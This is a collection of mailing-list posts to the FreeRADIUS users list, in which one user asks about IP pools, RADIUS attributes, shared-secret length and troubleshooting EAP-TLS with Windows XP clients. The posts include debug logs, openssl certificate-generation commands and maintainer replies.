exclude certain IP address in the IP Pool
Hi, I'm wondering whether we can exclude certain IP addresses from an IP POOL to be assigned to the client ? for example, the ippool in radiusd.conf has been defined as following: range-start = 192.168.167.90 range-stop = 192.168.167.100 This means that IP address between 192.168.167.90 to 192.168.167.100 can be assigned to a client. However, we wish to exclude IP address 192.168.167.94. Can we do so ? Thank you, lara = La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit - Guy de Maupassant - __ Do you Yahoo!? Yahoo! Mail - Find what you need with new enhanced search. http://info.mail.yahoo.com/mail_250 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Login-Time Attribute
Hi List, How does FreeRadius handle Login-Time attribute...? In the README ofFreeRadius, it's written: "Radiusd calculates the number of seconds left in the time span, and sets the Session-Timeout to that number of seconds. So if someones Login-Time is "Al0800-1800" and she logs in at 17:30, Session-Timeout is set to 1800 seconds so that she is kicked off at 18:00." Does it mean FreeRadius read the Login-Time attribute in users file, then calculate the time left based on current time and set the value in the session-timeout attribute ? If that's the case what happens if the users file contains both login-time attribute and session-timeout attribute ? I read somewhere that login-time is an RFC defined attribute...which RFC defines it ? I can't find any info on the net Thanks for clearing my doubts, Lara La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant -__Do You Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Re: eap-tls auth: access accept is sent but xp client keeps resending access-req
I still can't solve this problem.
To all people who have successfully configured EAP/TLS and FreeRadius, how did you generate the cert ? Through certificate authority in windows ? or openssl in linux ?
Is it necessary for the windows XP supplicant tobe able to contactthe domain of the cert ?
I tried with D-Link-650+ wireless card and eapol.log shows:
[3092] 12:43:31:912: ProcessReceivedPacket: != EAP_Packet[3092] 12:43:31:912: ProcessReceivedPacket: == EAPOL_Key[3092] 12:43:31:912: FSMKeyReceive entered for port D-Link AirPlus DWL-650+ Wireless Cardbus Adapter - Packet Scheduler Miniport[3092] 12:43:31:912: ElKeyReceiveRC4 entered for port D-Link AirPlus DWL-650+ Wireless Cardbus Adapter - Packet Scheduler Miniport[3092] 12:43:31:912: KeyLength = 13, KeyIndex = 131[3092] 12:43:31:912: ElKeyReceiveRC4: Signature in Key Desc does not match[3092] 12:43:31:912: ElKeyReceiveRC4 completed for port D-Link AirPlus DWL-650+ Wireless Cardbus Adapter - Packet Scheduler Miniport[3092] 12:43:31:912: FSMKeyReceive completed for port D-Link AirPlus DWL-650+ Wireless Cardbus Adapter - Packet Scheduler Miniport[3092] 12:43:31:912: ProcessReceivedPacket: STATE_AUTHENTICATED[3092] 12:43:31:912: ProcessReceivedPacket: Reposting buffer on port {CCB07A09-4681-4980-A6E7-6AEE66016B3B}[3092]
12:43:31:912: ElReadFromPort entered[3092] 12:43:31:912: ElReadFromPort: pPCB = 03247188, RefCnt = 3[3092] 12:43:31:912: ProcessReceivedPacket: pPCB= 03247188, RefCnt = 3[3092] 12:43:31:912: ProcessReceivedPacket exit[3092] 12:43:36:929: ElTimeoutCallbackRoutine entered[3092] 12:43:36:929: EAPOL-Key for transmit key *NOT* received within 5 seconds in AUTHENTICATED state[3092] 12:43:36:929: EAPOL Failure: Fail Count = 2[3092] 12:43:36:929: ElVerifyEAPOLKeyReceived: Calling ElZeroConfigNotify: failcount=2, prevauthtype=1, type=(2)[3092] 12:43:36:929: ElVerifyEAPOLKeyReceived: RpcCmdInterface[12] SUCCEEDed[3092] 12:43:36:929: ElZeroConfigNotify: Handle=(13), failcount=(2), lastauthtype=(1)
I feel that the following lines (taken from the above log) indicate that something's not rightbut I'm not sure what they mean...maybe somebody can help me ?
[3092] 12:43:31:912: ElKeyReceiveRC4: Signature in Key Desc does not match
[3092] 12:43:36:929: EAPOL-Key for transmit key *NOT* received within 5 seconds in AUTHENTICATED state
Thanks,
lara
Lara Adianto [EMAIL PROTECTED] wrote: The log file of freeradius shows that the authentication is successful, with access-accept being sent. I use tcpdump to confirm that access-accept is indeed sent and received by the access-point. However, after about 1 minute, the client will resend an access-request. And this keeps repeating... Ok... The only error log I can suspect from event viewer is this:... Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does not exist or could not be contacted. Enrollment will not be performed. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. That looks like the problem to me. Fix that, and the machine shouldstay on the network. And no, there's nothing you can do to FreeRADIUS to fix that problem. Alan DeKok.Lara Adianto [EMAIL PROTECTED] wrote:
Hi list,
I have a strange problem with EAP/TLS authentication.
I have done thesetup with the guide from Ken Roser's howtoprovided in freeradius site:
- The client is XP, wirelesscard: linksys WPC54G
- The freeradius server is installed in linux
- The access point is linksys WRT54G
- The certificates (with enhanced key usage for server and client authentication) for server and client are generated using openssl installed in freeradius server
The log file of freeradius shows that the authentication is successful, with access-accept being sent. I use tcpdump to confirm that access-accept is indeed sent and received by the access-point. However, after about 1 minute, the client will resend an access-request. And thiskeeps repeating...and the client seemsto fail the authentication thoughthe radius server keeps sending access-accept:
Sending Access-Accept of id 23 to 192.168.168.60:1232MS-MPPE-Recv-Key = 0xeb0e81327b50c60eb6bd54a9a02da65bcc87136bfdf0d0708f9be01db4078473MS-MPPE-Send-Key = 0xb01787160d97e7cf0ac614e56479ee7870a6068f142a2279b71e5d3894225f72EAP-Message = 0x03150004Message-Authenticator = 0x
No session-timeout attribute is sent though, like in ken roser's log file. Could this be a problem ?
The eapol.log shows : [1648] 15:45:13:583: ElWriteCompletionRoutine sent out 0 bytes with error -1073741823, but I'm not quite sure what it means.
The only error log I can suspect from event viewer is this:
Event Type:ErrorEvent Source:AutoEnrollmentEvent Category:NoneEvent ID:15Date:17-Nov-04Time:7:50:04 PMUser:N/AComputer:LAR4SDescription:Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does
eap-tls auth: access accept is sent but xp client keeps resending access-req
Hi list,
I have a strange problem with EAP/TLS authentication.
I have done thesetup with the guide from Ken Roser's howtoprovided in freeradius site:
- The client is XP, wirelesscard: linksys WPC54G
- The freeradius server is installed in linux
- The access point is linksys WRT54G
- The certificates (with enhanced key usage for server and client authentication) for server and client are generated using openssl installed in freeradius server
The log file of freeradius shows that the authentication is successful, with access-accept being sent. I use tcpdump to confirm that access-accept is indeed sent and received by the access-point. However, after about 1 minute, the client will resend an access-request. And thiskeeps repeating...and the client seemsto fail the authentication thoughthe radius server keeps sending access-accept:
Sending Access-Accept of id 23 to 192.168.168.60:1232MS-MPPE-Recv-Key = 0xeb0e81327b50c60eb6bd54a9a02da65bcc87136bfdf0d0708f9be01db4078473MS-MPPE-Send-Key = 0xb01787160d97e7cf0ac614e56479ee7870a6068f142a2279b71e5d3894225f72EAP-Message = 0x03150004Message-Authenticator = 0x
No session-timeout attribute is sent though, like in ken roser's log file. Could this be a problem ?
The eapol.log shows : [1648] 15:45:13:583: ElWriteCompletionRoutine sent out 0 bytes with error -1073741823, but I'm not quite sure what it means.
The only error log I can suspect from event viewer is this:
Event Type:ErrorEvent Source:AutoEnrollmentEvent Category:NoneEvent ID:15Date:17-Nov-04Time:7:50:04 PMUser:N/AComputer:LAR4SDescription:Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does not exist or could not be contacted. Enrollment will not be performed.
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Anyone can help me ? please ? I really need to solve this ASAP...
Thank you,
Lara
eapol.log:
[2952] 15:45:09:848: ElMediaEventsHandler entered -- EventType=6[2952] 15:45:09:868: ElMediaEventsHandler: Calling ElMediaSenseCallback [2952] 15:45:09:868: ElMediaSenseCallback: Entered[2952] 15:45:09:868: ElMediaSenseCallbackWorker: For interface (Wireless-G Notebook Adapter with SpeedBooster), GUID ({CCB5C4C2-79EB-4414-A58B-6382051C13F6}), length of block = 90[2952] 15:45:09:868: ElMediaSenseCallbackWorker: Callback for sense disconnect[2952] 15:45:09:868: FSMDisconnected entered for port Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport[2952] 15:45:09:868: Setting state DISCONNECTED for port Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport[2952] 15:45:09:868: FSMDisconnected completed for port Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport[2952] 15:45:09:868: ElMediaSenseCallbackWorker: Port marked disconnected Wireless-G Notebook Adapter with
SpeedBooster[2952] 15:45:09:868: ElMediaSenseCallbackWorker: processed, RetCode = 0[1648] 15:45:13:583: ElMediaEventsHandler entered -- EventType=7[1648] 15:45:13:583: ElMediaEventsHandler: Calling ElZeroConfigEvent [1648] 15:45:13:583: ElGetInterfaceParams: SsidLength=7, Found EapTypeId=13, SSIDLen=7[1648] 15:45:13:583: ElEnumAndOpenInterfaces: DeviceDesc = , GUID = {CCB5C4C2-79EB-4414-A58B-6382051C13F6}[1648] 15:45:13:583: ElNdisuioEnumerateInterfaces: Opening handle[1648] 15:45:13:583: NdisuioEnumerateInterfaces: NDISUIO bound to: (0) \DEVICE\{1A918A7C-F63C-4EF3-B6AD-12C1DFC6A4A1} - Realtek RTL8139 Family PCI Fast Ethernet NIC - Packet Scheduler Miniport
[1648] 15:45:13:583: NdisuioEnumerateInterfaces: NDISUIO bound to: (1) \DEVICE\{CCB5C4C2-79EB-4414-A58B-6382051C13F6} - Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport
[1648] 15:45:13:583: ElNdisuioEnumerateInterfaces: DeviceIoControl IOCTL_NDISUIO_QUERY_BINDING has no more entries[1648] 15:45:13:583: Device: \DEVICE\{1A918A7C-F63C-4EF3-B6AD-12C1DFC6A4A1}[1648] 15:45:13:583: Description: Realtek RTL8139 Family PCI Fast Ethernet NIC - Packet Scheduler Miniport[1648] 15:45:13:583: Device: \DEVICE\{CCB5C4C2-79EB-4414-A58B-6382051C13F6}[1648] 15:45:13:583: Description: Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport[1648] 15:45:13:583: ElEnumAndOpenInterfaces: Found interface after enumeration \DEVICE\{CCB5C4C2-79EB-4414-A58B-6382051C13F6}[1648] 15:45:13:583: ElEnumAndOpenInterfaces: Found PCB already existing for interface[1648] 15:45:13:583: ElCreatePort: Entered for Handle=(0D8C), GUID=({CCB5C4C2-79EB-4414-A58B-6382051C13F6}), Name=(Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport), ZCId=(1150), UserData=(033B961C) Notification=4[1648] 15:45:13:583:
ElGetInterfaceNdisStatistics: pwszDeviceInterfaceName = (\Device\{CCB5C4C2-79EB-4414-A58B-6382051C13F6})[1648] 15:45:13:583: ElCreatePort: PCB found for {CCB5C4C2-79EB-4414-A58B-6382051C13F6}[1648] 15:45:13:583: ElReStartPort: Entered:
doubt about EAP/TLS mechanism
Hi, Using EAP/TLS authentication, I noticed that even if the user doesn't exist int the users file, theEAP/TLS authentication still proceeds and the key exchange still occur, access accept is also sent together with MS-MPPE-Recv-Key and MS-MPPE-Send-Key. rlm_realm: No '@' in User-Name = "lara", looking up realm NULLrlm_realm: No such realm "NULL"modcall[authorize]: module "suffix" returns noop for request 3modcall[authorize]: module "files" returns notfound for request 3 -- user lara not found Is there any impact of this on the authentication process ? What's the purpose of checking users file in the EAP/TLS authentication ? Regards, Lara La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant - Do you Yahoo!?vote.yahoo.com - Register online to vote today!
Re: rlm_eap_tls: invalid ack received
I've tried that scripts, also scripts from Raymond Mc Kay and Ken Roser, but it seems that the client certs generated from those scripts have problem when it's installed in the XP machine. It says: the integrity of this certificate cannot be guaranteed. The certificate may be corrupted or may have been altered. The root cert is installed properly, and is valid ! I have no idea what caused the problem So, I use my own script to generate the certs, which is okay, when it's installed in xp: * CA*/usr/local/openssl/bin/openssl req -new -x509 -keyout cakey.pem -out ca_request.pem -days 888 /usr/local/openssl/bin/openssl pkcs12 -export -in ca_request.pem -inkey cakey.pem -out ca.p12 -cacerts /usr/local/openssl/bin/openssl pkcs12 -in ca.p12 -out ca.pem *Client*/usr/local/openssl/bin/openssl req -new -keyout clientkey.pem -out client_request.pem -days 888 cat client_request.pem client_new.pemcat clientkey.pem client_new.pem /usr/local/openssl/bin/openssl ca -policy policy_anything -out client_cert.pem -extensions xpclient_ext -extfile /usr/local/openssl/ssl/misc/xpextensions -infiles client_new.pem /usr/local/openssl/bin/openssl pkcs12 -export -in client_cert.pem -inkey clientkey.pem -out client.p12 -clcerts Server/usr/local/openssl/bin/openssl req -new -keyout serverkey.pem -out server_request.pem -days 888 cat server_request.pem server_new.pemcat serverkey.pem server_new.pem /usr/local/openssl/bin/openssl ca -policy policy_anything -out server_cert.pem -extensions xpserver_ext -extfile /usr/local/openssl/ssl/misc/xpextensions -infiles server_new.pem /usr/local/openssl/bin/openssl pkcs12 -export -in server_cert.pem -inkey serverkey.pem -out server.p12 -clcerts With the certs generated from the above script, eap/tls auth can be iniated, though it failed with the "Invalid ACK received" ... I just need tounderstand what caused this problem ... I've traced the code, seems that there's something wrong with the packet from client ... Can somebody shed a light on what happens ? is it the cert that caused the problem ? fragment size ? I've tried fragment size 1024, 512, 256 ... but problem's still there... I've tried disabling"validate server certificate", however this time I got another problem: 26431:error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned:s3_srvr.c:2010: Thanks, lara Alan DeKok [EMAIL PROTECTED] wrote: Lara Adianto <[EMAIL PROTECTED]>wrote: According to the posting, the problem lies in the server cert, that the client fails to validate, hence client will return invalid ack. My question is how can one make sure that the cert generated is valid ?scripts/CA.certsRun it, and it will generate some test certificates.Alan DeKok.- List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant -__Do You Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
rlm_eap_tls: invalid ack received
Hi list, I'm stuck with the following problem of EAP/TLS authentication: modcall: entering group authenticate for request 3 rlm_eap: EAP packet type notification id 4 length 6rlm_eap: EAP Start not found rlm_eap: Request found, released from the list rlm_eap: EAP_TYPE - tls auth: type "EAP" modcall: entering group authenticate for request 3rlm_eap: EAP packet type notification id 4 length 6rlm_eap: EAP Start not found rlm_eap: Request found, released from the list rlm_eap: EAP_TYPE - tls rlm_eap: processing type tls rlm_eap_tls: Authenticate rlm_eap_tls: Received EAP-TLS ACK messagerlm_eap_tls: Invalid ACK receivedmodcall[authenticate]: module "eap" returns invalid for request 3modcall: group authenticate returns invalid for request 3 auth: Failed to validate the user. This problem occurs in the middle of handshaking process... I found an old posting: http://www.mail-archive.com/[EMAIL PROTECTED]/msg11208.html, which is similar to mine... According to the posting, the problem lies in the server cert, thatthe client fails to validate, hence client will return invalid ack. My question is how can one make sure that the cert generated is valid ? and does anyone have the script from Radmond Mc Key (http://www.impossiblereflex.co(http://www.impossiblereflex.com/8021x/eap-tls-HOWTO.htm#6). The link doesn't exist anymore Thanks. lara La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant -__Do You Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Re: rlm_eap_tls compilation problem
Problem is solved. It's the problem with the shared library include. Thanks, lara Alan DeKok [EMAIL PROTECTED] wrote: Lara Adianto <[EMAIL PROTECTED]>wrote: Anyway, I've tried using freeradius-1.0.1 like what you have suggested, this time it complained about openssl/des.h: Making static dynamic in rlm_x99_token...That module doesn't currently have a maintainter. If you're notusing it, delete the directory containing the module, and everythingelse will still work.Alan DeKok.- List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant -__Do You Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
rlm_eap_tls, no response from server
Hi all, I have a problem with rlm_eap_tls. The radius server doesn't seem to accept the access request from the access point, though the log file in the access point indicates that it has indeed sent an access request. First of all, $ldd radiusd libcrypt.so.1 = /lib/libcrypt.so.1 (0x4001b000) libradius-0.9.3.so = /usr/local/lib/libradius-0.9.3.so (0x40048000)libltdl.so.3 = /usr/local/lib/libltdl.so.3 (0x4017f000) libdl.so.2 = /lib/libdl.so.2 (0x40186000) libnsl.so.1 = /lib/libnsl.so.1 (0x4018a000) libresolv.so.2 = /lib/libresolv.so.2 (0x401a1000) libpthread.so.0 = /lib/i686/libpthread.so.0 (0x401b3000) libc.so.6 = /lib/i686/libc.so.6 (0x401c8000) libcryptoki.so = /opt/Eracom/lib/libcryptoki.so (0x40303000) /lib/ld-linux.so.2 = /lib/ld-linux.so.2 (0x4000) libm.so.6 = /lib/i686/libm.so.6 (0x4031f000) Is the above correct ? Secondly, int the log file: Info: Starting - reading configuration files ... Error: rlm_eap_tls: conf N ctx stored Is the above normal ? I read on the previous post that this is normal with freeradius-0.9.3 (I know that freeradius-1.0.1 is out and more stable, but I'm sure that EAP/TLS can work with freeradius-0.9.3) In http://www.missl.cs.umd.edu/wireless/eaptls/?tag=missl-802-1, it is said that EAP/TLS can only work with SNAP version of openssl-0.9.7. Is this right ? Thanks for any reply, lara Alan DeKok [EMAIL PROTECTED] wrote: Lara Adianto <[EMAIL PROTECTED]>wrote: Anyway, I've tried using freeradius-1.0.1 like what you have suggested, this time it complained about openssl/des.h: Making static dynamic in rlm_x99_token...That module doesn't currently have a maintainter. If you're notusing it, delete the directory containing the module, and everythingelse will still work.Alan DeKok.- List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant - Do you Yahoo!? Yahoo! Mail - Helps protect you from nasty viruses.
Re: rlm_eap_tls, no response from server
I did run the server in debugging mode. What I meant by the log is the debugging statement from running /radiusd -X -A. Alan DeKok [EMAIL PROTECTED] wrote: Lara Adianto <[EMAIL PROTECTED]>wrote: I have a problem with rlm_eap_tls. The radius server doesn't seem to accept the access request from the access point, though the log file in the access point indicates that it has indeed sent an access request.I have no idea why you're looking in the log file, rather thanrunning the server in debugging mode, as suggested in the FAQ, README,and daily on this list.Go run the server in debugging mode and READ the output.Alan DeKok.- List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant - Do you Yahoo!? Yahoo! Mail - 50x more storage than other providers!
rlm_eap_tls compilation problem
Hi, anybody can help me with the compilation of rlm_eap_tls ? Freeradius version is 0.9.3, latest-snapshot of openssl: openssl-0.9.7-stable-SNAP-20040923.tar.gz $ LDFLAGS "-L/usr/local/openssl/lib" CPPFLAGS="-I/usr/local/openssl/include" ./configure --localstatedir=/var --sysconfdir=/etc --prefix=/opt seems that openssl lib and include files are found: configuring in ./types/rlm_eap_tlsrunning /bin/sh ./configure --localstatedir=/var --sysconfdir=/etc --prefix=/opt --enable-ltdl-install --cache-file=../../../../.././config.cache --srcdir=.loading cache ../../../../.././config.cachechecking for gcc... (cached) gccchecking whether the C compiler (gcc -g -O2 -D_REENTRANT -D_POSIX_PTHREAD_SEMANTICS -Wall -D_GNU_SOURCE -DNDEBUG -L/usr/local/openssl/lib) works... yeschecking whether the C compiler (gcc -g -O2 -D_REENTRANT -D_POSIX_PTHREAD_SEMANTICS -Wall -D_GNU_SOURCE -DNDEBUG -L/usr/local/openssl/lib) is a cross-compiler... nochecking whether we are using GNU C... (cached) yeschecking whether gcc accepts -g... (cached) yeschecking for openssl/ssl.h... yeschecking for DH_new in -lcrypto... yeschecking for SSL_new in -lssl... yeschecking how to run the C preprocessor... (cached) gcc -E But compilation failed... $ ./make Making static in rlm_eap_tls...gmake[8]: Entering directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap/types/rlm_eap_tls'gcc -g -O2 -D_REENTRANT -D_POSIX_PTHREAD_SEMANTICS -Wall -D_GNU_SOURCE -DNDEBUG -I../../../../include -I../.. -DOPENSSL_NO_KRB5 -c rlm_eap_tls.c -o rlm_eap_tls.oIn file included from rlm_eap_tls.c:27:eap_tls.h:52:25: openssl/err.h: No such file or directoryeap_tls.h:54:28: openssl/engine.h: No such file or directoryIn file included from eap_tls.h:56, from rlm_eap_tls.c:27:/usr/local/openssl/include/openssl/ssl.h:168:27: openssl/e_os2.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:171:26: openssl/comp.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:174:25: openssl/bio.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:177:26: openssl/x509.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:179:26: openssl/kssl.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:180:31: openssl/safestack.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:181:30: openssl/symhacks.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:316:28: openssl/crypto.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:317:27: openssl/lhash.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:318:28: openssl/buffer.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:319:25: openssl/pem.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:938:26: openssl/ssl2.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:939:26: openssl/ssl3.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:940:71: openssl/tls1.h: No such file or directory/usr/local/openssl/include/openssl/ssl.h:941:27: openssl/ssl23.h: No such file or directorygmake[8]: *** [rlm_eap_tls.o] Error 1gmake[8]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap/types/rlm_eap_tls'gmake[7]: *** [common] Error 1gmake[7]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap/types'gmake[6]: *** [static] Error 2gmake[6]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap/types'gmake[5]: *** [common] Error 1gmake[5]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap'gmake[4]: *** [static] Error 2gmake[4]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap'gmake[3]: *** [common] Error 1gmake[3]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules'gmake[2]: *** [all] Error 2gmake[2]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules'gmake[1]: *** [common] Error 1gmake[1]: Leaving directory `/usr/local/freeradius-0.9.3/src'make: *** [all] Error 2 Any idea ? Thanks. lara La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant - Do you Yahoo!?vote.yahoo.com - Register online to vote today!
non valid client cert for EAP/TLS
Hi list, I set upEAP/TLS FreeRadius auth for windowsxp client, and currently hit the wall in the certification generation. I followed the instructions in the following howto on the net: http://www.freeradius.org/doc/EAPTLS.pdf The certs are generated as follows: CA cert: * rm -rf demoCA openssl req -new -x509 -keyout newreq.pem -out newreq.pem -days 730 -passin pass:whatever -passout pass:whatever CA.sh -newca /dev/null /usr/local/openssl/bin/openssl pkcs12 -export -in newreq.pem -out root.p12 -cacerts -passin pass:whatever -passout pass:whatever /usr/local/openssl/bin/openssl pkcs12 -in root.p12 -out root.pem -passin pass:whatever -passout pass:whatever /usr/local/openssl/bin/openssl x509 -inform PEM -outform DER -in root.pem -out root.der Client cert: * /usr/local/openssl/bin/openssl req -new -keyout newreq.pem -out newreq.pem -days 730 -passin pass:whatever -passout pass:whatever /usr/local/openssl/bin/openssl ca -policy policy_anything -out newcert.pem -passin pass:whatever -key whatever -extensions xpclient_ext -extfile xpextensions -infiles newreq.pem /usr/local/openssl/bin/openssl pkcs12 -export -in newcert.pem -inkey newreq.pem -out cert-clt.p12 -clcerts -passin pass:whatever -passout pass:whatever /usr/local/openssl/bin/openssl pkcs12 -in cert-clt.p12 -out cert-clt.pem -passin pass:whatever -passout pass:whatever /usr/local/openssl/bin/openssl x509 -inform PEM -outform DER -in cert-clt.pem -out cert-clt.der Then I transfered root.der and cert-clt.p12 to winxp and installed them, following the instructions in Ken Roser's howto. The problem is that the client sert status showed: This certificate has an nonvalid digital signature. Attached is the ca cert and client cert (I don't bother with the server cert yet). Btw, when I installed the ca, it said that windows can't verify the integrity of the ca bec test.adianto.com can't be contacted. I chose to install the cert anyway, and the status is ok. So, prob that is not the source of the problem. What can cause the 'nonvalid digital signature'? any suggestions how to solve ? The openssl used is openssl-0.9.7d, installed in redhat linux. Thanks, lara La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit- Guy de Maupassant - Do you Yahoo!? Yahoo! Mail - Helps protect you from nasty viruses. ca_cert.cer Description: ca_cert.cer client_cert.cer Description: client_cert.cer
About Radius Attributes
Hello, I need some information about the following 'service-type' attribute: - Outbound - Administrative - NAS Prompt - Call Check - Callback NAS Prompt 1. In which case will a radius client request for the above service type or which radius clients usually request for the above service-type ? 2. What attributes are usually returned in the access-accept packet for the above service type ? For Service-type PPP / SLIP requested, is there any MANDATORY attributes that need to be returned by the radius server in the access-accept packet (Framed-IP-Address, Framed-MTU, etc) ? If the Framed-IP-Address is not a mandatory attribute to be returned for service-type PPP, how will the NAS decide the IP Address assigned to the user ? Thank you for any replies, lara = La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit - Guy de Maupassant - __ Do you Yahoo!? SBC Yahoo! - Internet access at a great low price. http://promo.yahoo.com/sbc/ - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: About Radius Attributes
Hi Alan, 1. In which case will a radius client request for the above service type or which radius clients usually request for the above service-type ? http://www.freeradius.org/rfc/attributes.html Click on Service-Type, and it will tell you what those values mean, and when they're used. I actually posted the question after reading the RFC. The RFC tells you a lot about the standard, but not about the current practice. What I need is some real-case examples. For example: - Example of Radius client that asks for service-type outbound, and what kind of devices it wants to be granted access. - Similarly, example of Radius client that asks for service-type administrative, NAS Prompt, Callback NAS Prompt, Call Check, and maybe some scenarios in which they are used ? 2. What attributes are usually returned in the access-accept packet for the above service type ? It depends on your local configuration. I understand that it depends of my own configuration. But I'm interested to know about the common practice out there. Would you care to elaborate more ? I'm still new to the Radius concept. For Service-type PPP / SLIP requested, is there any MANDATORY attributes that need to be returned by the radius server in the access-accept packet (Framed-IP-Address, Framed-MTU, etc) ? See the RFC's, and your NAS vendor documentation. Can you please provide me with some links to any NAS vendor documentation ? I don't have any specific NAS in mind currently. If the Framed-IP-Address is not a mandatory attribute to be returned for service-type PPP, how will the NAS decide the IP Address assigned to the user ? See the NAS documentation. It depends on the NAS. Alan DeKok. = La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit - Guy de Maupassant - __ Do you Yahoo!? SBC Yahoo! - Internet access at a great low price. http://promo.yahoo.com/sbc/ - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
shared secret length limitation
Hello, Is there any limitation on the max length of the shared secret ? I can't find any information from RFC2865. It is only stated that the shared secret MUST not be empty (length 0) to prevent packets from being forged easily, but it is not stated what the max length is. What is the common practice used by radius servers and clients ? Some implementations limit the shared secret to be between 1 - 128 characters. But Freeradius limits the shared-secret to 32. What is the rational behind this ? regards, lara = La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit - Guy de Maupassant - __ Do you Yahoo!? Yahoo! Movies - Buy advance tickets for 'Shrek 2' http://movies.yahoo.com/showtimes/movie?mid=1808405861 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re:shared secret length limitation
Lara Adianto [EMAIL PROTECTED] wrote: What is the common practice used by radius servers and clients ? Not too short, not too long. 16 is a very common length. But Freeradius limits the shared-secret to 32. What is the rational behind this ? Any longer than that, and it starts becoming unmanagable. What does 'unmanageable' mean here ? Would you care to elaborate further ? Is 16 bytes enough to protect the server from brute force attack ? thank you, lara = La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit - Guy de Maupassant - __ Do you Yahoo!? Yahoo! Movies - Buy advance tickets for 'Shrek 2' http://movies.yahoo.com/showtimes/movie?mid=1808405861 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
